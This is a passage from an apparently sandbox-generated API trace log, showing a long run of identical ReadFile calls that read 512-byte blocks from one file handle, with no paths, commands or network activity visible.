nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.668] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.669] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 